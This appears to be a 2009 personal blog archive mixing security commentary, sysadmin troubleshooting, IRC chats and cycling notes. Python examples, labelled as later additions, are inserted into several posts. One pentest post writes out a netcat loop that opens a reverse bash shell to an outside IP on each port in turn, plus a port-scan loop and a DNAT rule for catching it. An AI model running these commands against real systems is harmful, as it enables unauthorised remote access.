Thursday, December 31, 2009

Perl has made me fat and happy

I’ve found that I have trouble learning other languages. I start a project to learn another language and out of necessity it has to be simple. But once I start on it I quickly start thinking about how much easier and faster I could get it done in perl.

Wednesday, December 16, 2009

Context-free Abstract Security Scale

crunge: I would like to propose a metric for security - the context-free abstract security scale. Its unit will be the Mitnik. It is a logarithmic scale based on the natural log so something rated at 8 Mitniks is about 2.7183 times as secure as something rated at 7 Mitniks.
radsy: seems fair
adam_vollrath: there are a few metrics out there, government certification of platforms and junk like that
crunge: So when someone asks "How secure is OpenBSD out of the box?" you can answer with confidence, "11.8 Mitniks".
adam_vollrath: sounds dangerously misleading. and funny, i assume you're being funny
crunge: But this is abstract, and context-free so anything can be compared against anything else.
crunge: to be able to compare anything to anything else you need a measure with no inherent meaning. Meaning really screws up graphs.
crunge: It'll revolutionize the industry
tonymec: crunge: this scale would have to evolve, as today's stuff is a lot more secure (hopefully) than what was used X decades ago. However log(1) is 0 in any log base, so "normal" security would have to be kept at 0 mitniks, pushing yesterday's stuff, if it doesn't change, farther and farther into the negative, like identical answers to an IQ test give you a far worse score than they did your parents a generation ago.
crunge: Can you imagine the value to Pen Testers? They can walk in, sum up the Mitniks based on their evaluation and then itemize the gain in Mitniks based on implementing their recommendations
crunge: and IT managers can plot growth in Mitniks as policies are implemented. You'd be able to quantify ROI on buying that new IPS
crunge: tonymec: even better. It would be based on the average which would of course be determined by the Pen Testers. I smell a business model paradigm shift.
adam_vollrath: now you just need to create synergy between stakeholders
crunge: adam_vollrath: oh yeah, and crowdsource it.

Tuesday, December 15, 2009

I Won a Naming Contest

Kooky, I didn’t realize it until Frank got an email to me today. Word, I dig champagne.



Those who deal with security on a regular basis should take a look at Seccubus. It’s one thing to do a scan today and know about the vulnerabilities on your network today, but wouldn’t you like to know about a new potential risk as soon as possible?

Monday, December 7, 2009

Way to Protect Me Wamu/Chase/Whoever

So I get a notice saying my ISP failed to charge my CC on file. I go to check it out and the number they have on file is for a card that is supposed to be dead, it was replaced when the mag stripe wore out, maybe a year ago.



Both cards have apparently been active this last year.

Thursday, December 3, 2009

Noxious Cloud Computing

Ah, buzzwords. I generally dismiss them because they don’t really mean much and I should probably just dismiss Cloud Computing but I can’t. The term makes me angry. That might sound silly but I think it’s justified. Web 2.0, AJAX, and Long Tail are also buzzwords but they don’t make me angry. When people try to put those buzzwords into practice it’s really no big deal, they’re just subscribing to a fad and eventually it falls out of fashion. No big deal.



Cloud Computing is different. What is Cloud Computing? It’s where your processing and data is in The Cloud. What the crap is The Cloud? As a network professional I feel I’m qualified to answer this question simply, succinctly, and thoroughly. The Cloud is a symbol on a network diagram. It represents The Internet. It looks like a cloud. It looks this way because the Internet is nebulous.



That’s all it is. If you’re using Cloud Computing your computing is happening out there, in that part of the diagram: the one representing The Internet. There’s one key thing that separates Cloud Computing from traditional Internet hosting and services. With traditional Internet hosting and services your pictures are on flickr or photobucket, your email is with yahoo or hotmail or gmail, and your shopping is through ebay or amazon. With those services you have more or less fixed resources and your stuff lives on some servers somewhere.



With Cloud Computing, where’s your stuff? Do you know? I hear people say, “Oh, my pictures exist in the cloud.” Well, where are they? They’re in the cloud. It seems to me that people think that in the cloud means their resources are everywhere and will be accessible from anywhere. When your stuff is in the cloud it apparently means it can never be inaccessible, or lost, or stolen.



The reality is that in the cloud means that you don’t know where your resources are. That’s not to say that you should, either. If your grandpa uses Picasa for his pictures he doesn’t need to know where the files live or how they’re preserved (although it’s to his benefit to be able to know how his data might be lost). Google probably doesn’t want your grandpa to know how the backend of Picasa works because that might represent a security risk.



I’ll selectively borrow from Wikipedia what doesn’t challenge my rant:




In concept, it is a paradigm shift whereby details are abstracted from the users who no longer need knowledge of, expertise in, or control over the technology infrastructure “in the cloud” that supports them.




What does that mean? It means when your data is in the cloud it’s somewhere on the Internet and you neither know nor care where. That’s not to say it’s somehow more accessible, more available, or more secure. It just means users don’t know. And not knowing is fine, but before Cloud Computing your grandpa didn’t know where his pictures were and he knows no more or no less now that Cloud Computing is here.



I guess saying Cloud Computing sounds cooler and smarter than, “On the Internet, somewhere.” What it sounds like to me is that you don’t know but either are afraid to say you don’t know or don’t realize you don’t know. I think this Cloud is really a fart - it smells terrible and will hopefully disperse soon.

Rode 11 Miles

Needed to get my car serviced but still go to work. Didn’t want to ask anyone to drive me there and back. Luckily the auto shop is only 5.5 miles from work so I threw my bike in the back of my car, drove to the shop, then rode to work.



All told, 11 miles today with some hills on the way back. I tried to just push harder instead of downshifting and was successful some of the time. I’m pleased overall.



Also, if you’re in the San Diego area, Mira Mesa Automotive, owned by Jim Boucher (Boo-shay) does good work and they don’t mess around with you.

Monday, November 9, 2009

WEP Weakness Explained

HS^^: "Because RC4 is a stream cipher, the same traffic key must never be used twice. The purpose of an IV, which is transmitted as plain text, is to prevent any repetition, but a 24-bit IV is not long enough to ensure this on a busy network. The way the IV was used also opened WEP to a related key attack. For a 24-bit IV, there is a 50% probability the same IV will repeat after 5000 packets."
HS^^: so what happens if the IV is the same
HS^^: and the traffic key is the same...
HS^^: then you have 2 exactly the same packets, what does it matter
crunge: HS^^: Do you understand what stream ciphers do?
HS^^: crunge they encode per bit.. thats what i just read
crunge: HS^^: specifically they spit out a keystream that is XORed with the plaintext
crunge: HS^^: A given key will always spit out the same keystream. In WEP the IV is used as part of key. For 64 bit you have 40 bits of key and 24 bits of IV
crunge: HS^^: So when an eavesdropper sees two packets encrypted with the same key and IV he can XOR those packets together and recover the keystream for that key+IV. He can XOR that against the original packets and any other packets with that key+IV to decrypt them
crunge: HS^^: He can now also encrypt arbitrary packets using that keystream
crunge: HS^^: He can then use *that* technique to throw out broadcast messages using his known keystream to cause other hosts to send replies with previously unseen IVs which he collects. Thus he builds up his database of IV -> keystream mappings
crunge: HS^^: This database I believe is then used in a known plaintext attack to recover the key
ToXBoT: crunge, how the eavesdropper can manage to conclude that the two packets are encrypted with the same key+IV?
crunge: ToXBoT: the IV must be included in the packet in the clear. Otherwise no host would know the IV and therefore no one would be able to decrypt it.


Addendum: The above is slightly incorrect. XORing the two ciphertexts together produces the XOR of the two plaintexts. This should be fairly easy to crack. Once one of the plaintexts is recovered the attacker can recover the keystream.
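
The keystream-reuse point from the log and the addendum, as an added example that is not part of the original post. RC4 is implemented inline only to keep it self-contained, and the IV, key and packet contents are constructed sample values, not captured traffic.

```python
# Added example, not from the original post: why a repeated WEP IV under RC4 is fatal.
# RC4 is implemented inline only to keep the demo self-contained; IV, key and packet
# contents are constructed sample values, not captured traffic.

def rc4_keystream(key: bytes, length: int) -> bytes:
    """Return `length` bytes of RC4 keystream for `key` (KSA followed by PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                    # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(iv: bytes, key: bytes, plaintext: bytes) -> bytes:
    """WEP-64 style: the 24-bit IV is prepended to the 40-bit key to seed RC4.
    The real frame also carries a CRC-32 ICV and the IV in the clear; omitted here."""
    assert len(iv) == 3 and len(key) == 5
    return xor(plaintext, rc4_keystream(iv + key, len(plaintext)))


IV = b"\x01\x02\x03"                    # constructed; on the air it is sent in the clear
KEY = b"\xaa\xbb\xcc\xdd\xee"           # constructed 40-bit shared key
P1 = b"GET /index.html HTTP/1.0\r\n"    # constructed packet whose contents are predictable
P2 = b"password=hunter2&login=1\r\n"    # constructed packet an eavesdropper would want
C1 = wep_encrypt(IV, KEY, P1)           # both encrypted under the SAME IV and key
C2 = wep_encrypt(IV, KEY, P2)


def ciphertext_xor_equals_plaintext_xor() -> bool:
    """Same IV + same key gives the same keystream, which cancels out of C1 XOR C2."""
    return xor(C1, C2) == xor(P1, P2)


def recover_keystream(known_plaintext: bytes, ciphertext: bytes) -> bytes:
    """One known (or guessed) plaintext under an IV yields that IV's keystream."""
    return xor(known_plaintext, ciphertext)


def decrypt_other_packet_without_key() -> bytes:
    """The recovered keystream decrypts every other packet sent under that IV."""
    return xor(C2, recover_keystream(P1, C1))


def still_works_with_fresh_iv() -> bool:
    """Control case: a different IV changes the keystream and the cancellation fails."""
    c2_fresh = wep_encrypt(b"\x01\x02\x04", KEY, P2)
    return xor(C1, c2_fresh) == xor(P1, P2)
```

The control case is the whole lesson: the shared key never leaks here, only the keystream for one IV, which is why a 24-bit IV space that repeats on a busy network is enough to break WEP.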

Friday, November 6, 2009

"I understand your reasons for making your choices, but try and understand mine before you discount them; I don’t vote for anybody who abuses my rights, like I wouldn’t put up with someone who would demand to kick me in the nuts before I could walk into my own house. I don’t vote for whoever might give my cojones the weakest kick- I vote for someone who isn’t going to kick me there. When more people do that, we will all see better presidents and senators. Until enough people do that, all we will see is more nut-kicking, and being handed an ice pack by the winner doesn’t make it any better."
-- Bill Albertson in a comment on BoingBoing about the ACTA (via brettflorio)

ACTA: Are you guys done yet?

Here we have a set of rules that are basically unenforceable.



“That ISPs have to proactively police copyright on user-contributed material.”



If you’re a connectivity provider you can’t effectively monitor all the traffic going through your network and still provide high quality service. The ISPs that have the most effective monitoring will provide the poorest service and lose customers to those ISPs that have less effective monitoring.



If you’re a hosting company it’s a similar problem. The servers on that network have an enormous amount of deep content that can’t easily be discovered through probing and can’t be discovered when going over an encrypted channel. Hosting companies charge for bandwidth. Are they going to charge their customers for bandwidth used while the hosting company is looking for copyrighted material?



“That ISPs have to cut off the Internet access of accused copyright infringers or face liability.”



And that will stop them from going to another ISP? Preferably one that doesn’t shut off their own customers (and lose business) so readily?



“Mandatory prohibitions on breaking DRM, even if doing so for a lawful purpose (e.g., to make a work available to disabled people; for archival preservation; because you own the copyrighted work that is locked up with DRM)”



Because it’s worked so well thus far.



Stuff like this is great. It wastes taxpayer time and dollars. The product serves to put pressure on the filesharers and make them better at what they do. I’d like to see some kind of evidence that DMCA has reduced copyright violation. I’m willing to bet that it’s gone up since DMCA was created.



If this goes through and we see that it does nothing to stop “the problem” can we finally agree that we as a society don’t have time for bullshit like this?

Tuesday, November 3, 2009

Can't Connect to Cyrus Sieve

So I’m trying to use sieveshell on a cyrus imap server. It just tells me it can’t connect. The logs are not very helpful:




Nov 3 19:39:50 li9-96 cyrus/master[2167]: about to exec /usr/lib/cyrus/bin/timsieved
Nov 3 19:39:50 li9-96 cyrus/sieve[2167]: executed
Nov 3 19:39:50 li9-96 cyrus/sieve[2167]: accepted connection
Nov 3 19:39:54 li9-96 cyrus/master[2160]: process 2167 exited, status 0


I try to telnet and it works:




jason@renfield:/etc$ nc localhost 2000
"IMPLEMENTATION" "Cyrus timsieved v2.2.13-Debian-2.2.13-14+lenny3"
"SIEVE" "fileinto reject envelope vacation imapflags notify subaddress relational comparator-i;ascii-numeric regex"
"STARTTLS"
OK
LOGOUT
OK "Logout Complete"


A lot of looking and I find this: http://linux.derkeiler.com/Mailing-Lists/Debian/2004-02/3871.html but I’m already set to PLAIN. In fact my configs, versions, and OS are exactly the same on this system as on another system where sieve is working fine.



Eventually I notice this connecting to my working box:




jason@hatchery:/etc$ nc localhost 2000
"IMPLEMENTATION" "Cyrus timsieved v2.2.13-Debian-2.2.13-14+lenny3"
"SASL" "NTLM LOGIN PLAIN DIGEST-MD5 CRAM-MD5"
"SIEVE" "fileinto reject envelope vacation imapflags notify subaddress relational comparator-i;ascii-numeric regex"
"STARTTLS"
OK
LOGOUT
OK "Logout Complete"


There’s an extra line in there, beginning with “SASL”. The other guy had a SASL problem. I had already checked to make sure I have the same cyrus packages but I didn’t check sasl packages. I finally find that I’m missing libsasl2-modules. Install that, restart cyrus and saslauthd (probably didn’t need to restart both), and everything works.



It would have been nice if sieveshell said, “I can’t connect because there’s no SASL mechanisms”.
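
The check sieveshell didn’t do, added here as an example that is not part of the original post: it parses the timsieved greeting into its capabilities and says why a login would fail. The two banners are the ones quoted above; fetch_banner is a hypothetical helper that automates the nc session for live use.

```python
# Added example, not part of the original post: turn the "nc localhost 2000" check above
# into a script that parses the timsieved greeting and says whether a login can work.
# fetch_banner is a hypothetical helper for live use; the two banners are the ones quoted above.
import shlex
import socket

WORKING_BANNER = '''"IMPLEMENTATION" "Cyrus timsieved v2.2.13-Debian-2.2.13-14+lenny3"
"SASL" "NTLM LOGIN PLAIN DIGEST-MD5 CRAM-MD5"
"SIEVE" "fileinto reject envelope vacation imapflags notify subaddress relational comparator-i;ascii-numeric regex"
"STARTTLS"
OK
'''

BROKEN_BANNER = '''"IMPLEMENTATION" "Cyrus timsieved v2.2.13-Debian-2.2.13-14+lenny3"
"SIEVE" "fileinto reject envelope vacation imapflags notify subaddress relational comparator-i;ascii-numeric regex"
"STARTTLS"
OK
'''


def parse_capabilities(banner: str) -> dict:
    """Map each quoted capability line to its value (None when it has none), stopping at OK."""
    caps = {}
    for line in banner.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.split()[0] == "OK":
            break
        fields = shlex.split(line)        # strips the quotes; ';' inside quotes is kept
        caps[fields[0].upper()] = fields[1] if len(fields) > 1 else None
    return caps


def sasl_mechanisms(caps: dict) -> list:
    """The space-separated list behind "SASL", empty when the line is absent."""
    return (caps.get("SASL") or "").split()


def diagnose(banner: str, wanted: str = "PLAIN") -> str:
    """Explain, in one line, why sieveshell would fail to authenticate with `wanted`."""
    caps = parse_capabilities(banner)
    mechs = sasl_mechanisms(caps)
    if not mechs:
        return "no SASL mechanisms advertised: is libsasl2-modules installed?"
    if wanted.upper() not in mechs:
        return f"{wanted} not offered; server offers {' '.join(mechs)}"
    if wanted.upper() in ("PLAIN", "LOGIN") and "STARTTLS" not in caps:
        return f"{wanted} offered without STARTTLS: credentials would cross the wire in the clear"
    return "ok"


def fetch_banner(host: str = "localhost", port: int = 2000, timeout: float = 5.0) -> str:
    """Hypothetical helper: read the greeting from a live server, then log out politely."""
    lines = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        f = sock.makefile("rwb")
        for raw in f:
            line = raw.decode("utf-8", "replace")
            lines.append(line)
            if line.startswith("OK"):
                break
        f.write(b"LOGOUT\r\n")
        f.flush()
    return "".join(lines)
```

Against a live box, `print(diagnose(fetch_banner()))` gives the one-line answer the author wanted from sieveshell.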

Tuesday, October 13, 2009

You STEAL your software

…because no one can afford to write professional quality software and then give it away for free.

Friday, October 9, 2009

Biked 8 miles... on the Freeway

4 miles there, 4 miles back. downhill half the way there… uphill half the way back.

Friday, October 2, 2009

Dialing for nmap

http://www.geisterstunde.org/drupal/?q=nmap



This is pretty clever. Dude rigged up some Asterisk dial plan to kick off nmap against an IP that you punch in, separated by pounds.



What would be really fun would be to make one of these publicly available, maybe even by 800 number, then make a note of all the IPs that people think are worthy of being scanned. Could be someone’s already found a host they think is more exposed than it should be.

Rogue Phone Charging Station

You may have seen cell phone charging stations at airports. They take your money and have adapters for a lot of different phone types. Stick your money in, plug in your phone and get it charged during your layover.



This got me thinking - a lot of phones, particularly smart phones, are going to USB cable charging. This makes sense since they’ve got cameras, play MP3s, and any number of mobile device functions. These functions generate and consume a lot of data that’s got to come from somewhere and has to be backed up. Since USB does data transfer and does power it’s a natural fit.



Those charging stations provide power but don’t do data transfer. But what if they did? Would you notice? You plug in your phone and leave it plugged in for twenty minutes; how much data could it transfer? Most USB data devices expose themselves as simple read/write mass storage. A charging station could slurp up a lot of data in twenty minutes, especially if it knew where to look based on device type, which could be determined through probing. It would be even quicker to drop a small piece of malware on the phone.



I’m not just about pointing out potential problems, I’m also about solutions. One could conceivably have a USB condom. This would be a USB coupler that will allow power to pass through and potentially could have enough smarts to probe the device plugged into it so that the device thinks it’s plugged into a computer. I’ve heard of devices that will only accept power when they’re plugged into a computer.



Keep this in mind. If your phone is low, it might not be a good idea to plug it into a foreign port. That charging station or helpful stranger might not be as well-intentioned as it seems. Even if they are, they might have been compromised such that they are unwittingly participating in the compromise of your handheld device.

Rode to Work

Rode 6.2 miles to work. 35 minutes moving time. Got up to 33.5 MPH on a nice hill. =D

Thursday, September 24, 2009

Blind Connect-back Through Restrictive Firewall

The following scenario is admittedly far-fetched. It’s unlikely that you’ll actually encounter it but you might encounter a situation that’s similar. You’re in a pen test and you’ve found a host that you can execute commands on but you can’t see the results. It should be simple enough to shovel a shell back to you but that’s not working. You know you’ve got commands running because you can send a ping command and see the pings coming to you. There might be a restrictive firewall between you and the target that isn’t letting the TCP/UDP streams through for ports you choose. If this sounds silly consider that there are systems out there that actually use RPC over email.



You can craft a port scan through simple commands that you can launch into your target. However if you can’t see the results of the scan you don’t know what port you can connect through. A minimalist port scan might look like this:




(for i in $(seq 1 65535); do nc -zw 3 34.56.78.90 $i && echo $i open; done) > scan_results



In this case we can’t see the results. You can watch a packet capture on your box and then subsequently send another command to connect to the port that got through. I’m lazy, impatient and efficiency minded. Let’s combine our scan with the shoveling.




i=1;while [ $i -lt 65535 ]; do nc -e /bin/bash 34.56.78.90 $i && exit;i=$(( i + 1 ));done



So this will skip the port scan and just look for a way out. But what are you supposed to do, leave a netcat listening on every port? If you have an extra IP (34.56.78.91) we can send every port to our netcat port. It looks something like this:




# DNAT is only valid in the nat table's PREROUTING (or OUTPUT) chain, not in INPUT
iptables -t nat -I PREROUTING -p tcp -d 34.56.78.91 -j DNAT --to-destination 34.56.78.90:5555



If your netcat listener is on 34.56.78.90:5555 any TCP connection to any port on 34.56.78.91 will get forwarded to your netcat listener. Blind injection could also be used to send packets to an idle host while you watch the IP IDs returned by the idle host. Essentially you can cause a remote host to start an idle scan for you to watch from your host, abstracting away your real IP.



This is all theoretical, and you’ll probably never find a situation where this is the answer. I’ve played with the pieces but haven’t put it all together. I’m just the idea guy.
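
The defender’s side of the same idea, as an added example that is not part of the original post: walking outbound ports one by one leaves a run of dropped SYNs to consecutive ports on one destination, which an egress firewall’s LOG rule records. The log lines are constructed in the standard netfilter LOG key=value layout, and the EGRESS-DROP prefix is an assumed --log-prefix.

```python
# Added example, not from the original post: the defender's view of the loop above.
# Walking outbound ports one by one leaves a run of dropped SYNs to consecutive ports
# on a single destination, which an egress firewall's LOG rule records. The lines
# below are constructed in the standard netfilter LOG key=value layout; the
# "EGRESS-DROP" prefix is an assumed --log-prefix, not something from the post.
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r"SRC=(?P<src>[\d.]+) DST=(?P<dst>[\d.]+) .*?PROTO=TCP .*?DPT=(?P<dpt>\d+)"
)


def make_sample_log() -> list:
    """Constructed log: one host walks ports 1..40 on one IP; another host retries SMTP."""
    t0 = datetime(2009, 9, 24, 10, 1, 0)
    lines = []
    for n in range(1, 41):
        ts = (t0 + timedelta(seconds=n)).strftime("%b %d %H:%M:%S")
        lines.append(f"{ts} gw kernel: EGRESS-DROP IN=eth0 OUT=eth1 SRC=192.168.1.5 "
                     f"DST=34.56.78.91 LEN=60 PROTO=TCP SPT={40000 + n} DPT={n} SYN")
    for n in range(2):  # benign-looking noise: same port twice, not a walk
        lines.append(f"Sep 24 10:01:{5 + 25 * n:02d} gw kernel: EGRESS-DROP IN=eth0 OUT=eth1 "
                     f"SRC=192.168.1.9 DST=203.0.113.10 LEN=60 PROTO=TCP SPT={51000 + n} DPT=25 SYN")
    return lines


def parse_drops(lines):
    """Yield (src, dst, dport) for each TCP drop line in the LOG layout."""
    for line in lines:
        m = LOG_RE.search(line)
        if m:
            yield m["src"], m["dst"], int(m["dpt"])


def longest_consecutive_run(ports) -> int:
    """Length of the longest run of consecutive port numbers (1, 2, 3, ...) in `ports`."""
    uniq = sorted(set(ports))
    if not uniq:
        return 0
    best = run = 1
    for prev, cur in zip(uniq, uniq[1:]):
        run = run + 1 if cur == prev + 1 else 1
        best = max(best, run)
    return best


def find_port_walks(lines, min_ports: int = 20, min_run: int = 10) -> list:
    """Flag (src, dst) pairs hit on many distinct ports or on a long consecutive run.
    A sequential loop like the one above trips `min_run` long before `min_ports`."""
    seen = defaultdict(list)
    for src, dst, dpt in parse_drops(lines):
        seen[(src, dst)].append(dpt)
    findings = []
    for (src, dst), ports in sorted(seen.items()):
        distinct, run = len(set(ports)), longest_consecutive_run(ports)
        if distinct >= min_ports or run >= min_run:
            findings.append({"src": src, "dst": dst,
                             "distinct_ports": distinct, "longest_run": run})
    return findings


if __name__ == "__main__":
    for f in find_port_walks(make_sample_log()):
        print(f"possible outbound port walk: {f['src']} -> {f['dst']} "
              f"({f['distinct_ports']} ports, run of {f['longest_run']})")
```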



Update: That was fast.

Life with Schizophrenia

My girlfriend has schizoaffective disorder, a disorder closely tied to schizophrenia. I found this comic which explains many of the life experiences a schizophrenia sufferer has. I thought it was worth sharing. Most people have really inaccurate perceptions of schizophrenia and this clears many of them up.

Monday, September 14, 2009

Amarok: Unsafe at any speed

crunge: I can't help but wonder why Amarok is such an unstable piece of shit
mrecho: ya, dont like the new version
crunge: The things it does it does well. What it doesn't do is... run
crunge: It's not the new version. It has always crashed just updating your library. And instead of fixing basic shit like that they're adding features
crunge: Amarok 2: Unsafe at any speed
mrecho: ive never had issues with amarok crunge ....
kaboofa: mpc :D
mrecho: even with 30+ gigs of music on it
crunge: Yeah. I have about that and it's never worked well. Not on Gentoo, not on kubuntu 32, nor kubuntu 64
mrecho: whats the main issue your having?
crunge: So I'll be browsing some websites right. Text websites, nothing with flash or sound. Amarok will be stopped, sitting in my tray. All of a sudden I get a notification saying Amarok has crashed
mrecho: wtf...
crunge: no reason I can get outside it rescanning my collection *which hasn't changed*
crunge: and it does this at random
crunge: I'm trying to add music to my girlfriend's ipod, which it seems capable of doing but when I *delete* songs it crashes.
crunge: When I launch it again it figures out that the songs are gone and I can try adding music again
crunge: and this isn't a bug it's just a retarded absence of a feature. You can add songs to a music device by finding a track and right click blah blah blah. Unless it's in your playlist. Can't do it from your playlist. So if you've got a playlist of the stuff you want, too bad
crunge: you have to find the actual playlist file and add that to your device. But it won't tell you where it actually saves the playlist. There is no Save As. Only Save.
crunge: which, it's probably in the fucking database. There's an "export" option. So you *can* export it out of Amarok so Amarok can read it in and put it on your music player
crunge: Hey! I got those songs to load. And 80% of the titles are SHA1 hashes

Friday, September 11, 2009

Unified Threat Management

Saying that an appliance provides Unified Threat Management is like saying a kevlar vest provides Complete Bodily Protection.

Bike Ride

6.2 mile ride to work with a friend. A couple of small uphills and a few large downhills. Not looking forward to the trip home.



The trip home was better than the trip there. Got into a great groove going up the hills. Helped having a fellow rider to talk with. Got home feeling really good.



12 miles total (return trip was more right turns)

Wednesday, August 26, 2009

Monday, August 24, 2009

Here we clearly demonstrate the line that classifies disorders. It’s a disorder when it interferes destructively with your life. Calvin’s possible disorder only reinforces his behavior as a little boy.

Wednesday, August 19, 2009

Pwnd Adj This Lady


PWND (adj): This lady.

Apologize to Alan Turing

There’s a petition getting signatures demanding that the British government apologize (posthumously) to Alan Turing for their treatment of him as a homosexual.



I think they saw the objective, jumped in their cars and drove right past it, waving in a really friendly way. Alan Turing wasn’t convicted of being Alan Turing, he was convicted of being a homosexual. Lots of people were homosexual at the time and were persecuted for it. No one at the time was persecuted for being Alan Turing.



How about we make a petition for the government to apologize to all homosexuals for their treatment by the government? Alan Turing is dead and I don’t think an apology is going to change that or make him feel better. But it might make some homosexuals that are alive feel a little better if they receive an apology.



Hooray for empty gestures!

Tuesday, August 18, 2009

How to Make Friends

Someone on a forum was relating how they feel they need more friends and asking how they can go about getting them. They explained a failed attempt to make friends at a political gathering and concerns about people with different religious beliefs. I said this:




Friends are a subset of people and compatibility, in my opinion, only has a loose correlation with matching interests. You might meet people whose interests match up to yours 90% of the time and you’ll find that they’re a dick. Interests really don’t matter that much in making friends.



You don’t control the fish you catch, you just fish until you catch one, then evaluate the fish to see if it matches your criteria. The way to increase the chances of getting the fish you want is to fish a lot. Of course, in the process of fishing you get better at fishing.



If you want to make friends you just have to meet and engage a lot of people. Random people in random places. You engage a lot of people and you increase your probability of finding a friend. I believe you should forget about focusing on places where people with similar views congregate. Go out to places and engage the people you find where you go… the bar, the grocery store, the gym, the hardware store. A lot of people will think you’re a freak because some part of their brain is still four years old and is afraid to talk to strangers. Whatever, they’re welcome to self-segregate.



As for religious, political, or similar affiliations, push that aside. Well balanced people don’t spend every waking moment staring at their religion or political ideology. Well balanced people have those things as a part of their life but most of their life is working, spending time with their family and friends, and totally mundane shit like making toast. Few people make toast for Jesus, G-d, Allah, or whoever. They make toast because they’re hungry. The people that make toast for the Democrats or Shiva are batshit and should be avoided. If you engage the well balanced people with an open mind and interest in their beliefs you’ll learn a lot about what makes them who they are. If they have an open mind they’ll wonder about your beliefs and how those beliefs make you who you are. If they try to shove their beliefs down your throat tell them to knock it off and don’t do it in the future. If they fail at that remove them from their friend candidacy.



We all have more common ground than not. The rain falls on the rich and poor alike. We’ve all experienced loss, we all like food, we all wonder to some degree what things are all about. Jobs and political beliefs are ephemeral and a poor basis for friendship anyway.



All that rambling aside, what I think you want to look for is an attitude. They can hate your music, hate your clothes, hate your hobbies, but if your attitudes are compatible then you might be life long friends.


Tuesday, August 11, 2009

A little over five mile ride with moderate hills. Gloomy and overcast. Bike seat wasn’t tight enough so I was shifting back and forth most the ride.

Thursday, August 6, 2009

Speaking of Twitter...

I’ve heard it’s pretty big in Iran, and they had a relatively unpopular fellow sworn in as president having won 2/3 of the popular vote…

Twitter's Getting DDoS'd

I wonder if the packets are 140 bytes or less.

Wednesday, August 5, 2009

Van Halen M&M's: Really Clever

I had heard the story about NO BROWN M&Ms before but never heard the real explanation. The truth is that that part of the contract was really, really clever.

Tuesday, August 4, 2009

GRRRRRARRRRRRRR! MURDER!

Why is it so hard to demonstrate to tech support people that you know what you’re talking about? I guess it’s because they normally deal with people who don’t know what they’re talking about. I’m sure a lot of those people immediately say they know what they’re talking about.



But I do. In fact, I know more than both the senior guys on the other end of the line. But I get to listen to the polite one have me conduct useless tests and the defensive one tell me my network setup is wrong when he doesn’t really have a handle on networking.



It starts when defensive guy comes to upgrade our stuff. He logs into the provider-owned router and sees some settings he doesn’t recognize so he deletes them. Doesn’t even question their existence. That device was subsequently determined unnecessary and removed but the missing functionality was never configured elsewhere as appropriate. Because the guy assumed it was a mistake and not critical configuration.

Saturday, August 1, 2009

This is a terrible picture of the view in the other direction.



This picture is also against the rules.

This picture is against the rules. I was told I couldn’t take this picture even though it has nothing to do with the performance.



A better reason would be that looking at a picture of a city is like looking at a stuffed hummingbird: you capture the idea but lose everything about the experience that makes it amazing.

At the San Diego summer pops at Embarcadero south. I really live in a beautiful city.

OpenSolaris limits usernames to 8 chars

http://www.opensolaris.org/os/community/security/library/long_usernames/%3Bjsessionid=1BE7FA9181CEC82352B564BE46EDD045



Oh noes! we’z might lose supports for rcp/rdist/uucp. Those are teh internetz!



Really, Sun? Really?

Friday, July 31, 2009

Apple Claims New iPhone Only Visible To Most Loyal Of Customers

I too can see it!

OMG! My ignorance about dreadlocks makes other people inferior!

These are actually my friend’s dreadlocks. I shouldn’t be, but I’m stunned at how bad or disinclined people are at recognizing and challenging their assumptions. If someone is doing something I don’t understand it must mean that they are stupid, right?



I didn’t get a hair cut for six years so my hair got silly long. When I eventually got it cut I donated it so some poor kid getting chemo can have some hair. When you get lots of hair cut off some barbers/stylists will ask, “Would you like to donate your hair?”



People assert that dreadlocks are created by not washing your hair and that you can’t. Proper dreadlocks are created by not combing your hair. Wash liberally. The texture of dreadlocks kind of reminds me of a wool blanket. Is it really so hard to wash a wool blanket?



Even if something being given away is not something you think is useful, why give people shit for trying to give something away that someone might find useful?

Ceci n'est pas une clé

I have one of those remote keyless entry key fobs for my car, to unlock and lock the doors as I approach and leave my car.



Anyone else occasionally find yourselves not thinking and try to use it on the front door of your home?

Thursday, July 30, 2009

Jailbreaking iPhone Causes Nuclear War (ish)

So, it should be illegal to load custom software on your iPhone because you could potentially use it to disrupt cell towers.



Isn’t it already illegal to disrupt cell towers?

Wednesday, July 29, 2009

Recursion

Tumblr Captures the Essence of Web 2.0

For those who aren’t indoctrinated, tumblr has a feature called “reblogging”. You see a post on another tumblr user’s blog that you like. There’s a link that says reblog. Click this and boom, it’s now on your blog with a little space on the bottom for you to say lol or wtf or this is so stupid.



As I browse the directory for some of the blogs with the highest “tumblarity” I find a common thread: they’re mostly pictures and the same pictures as you see on digg, reddit, etc and on each others’ blogs. Many of the posts you find on digg, reddit, and the like are simply references to blog posts talking about the thing that’s actually of interest.




v---<---<---<---<---<---<---<----+
+--> Tumblr Reblog Ad Nauseam ->-^--> Original Tumblr ---> Twitter --> Reddit --> Random Blog -v
+--> Tumblr Reblog Ad Nauseam ->-v--> Original Tumblr ---> MySpace --> Digg ----> Random Blog -+--> Actual Story
^---<---<---<---<---<---<---<----+


And this is really the essence of blogging, the essence of Web 2.0. It’s not that everyone participates in building new and exciting media. A few people make new and exciting media and others swarm around it and show it to you hoping that they can catch just the tiniest bit of fame or recognition for having brought it to you. Web 2.0 brings everyone the power to have their voice heard; puts a microphone in everyone’s hand. Alas, most people don’t have anything interesting to say but given the microphone you have to say something.



If this is Web 2.0, I think I’ll hold out for SP1.

Tuesday, July 28, 2009

Monday, July 27, 2009

Friday, July 24, 2009

Copy-cats Deploy Trojans on Anti-sec's Fame

An interesting tool has been seen in the wild that shares its name with one used by Anti-sec in one much-ballyhooed intrusion. However, instead of being a tool to help you own a box, it gets you owned.



I can’t really endorse this kind of thing but it is a good reason why people need to learn security principles if they hope to put them into practice.

CBC-MAC on the command line


# 32 hex digits for the AES-128 key and the IV (16 bytes each); openssl zero-pads shorter -K/-iv values and warns about it
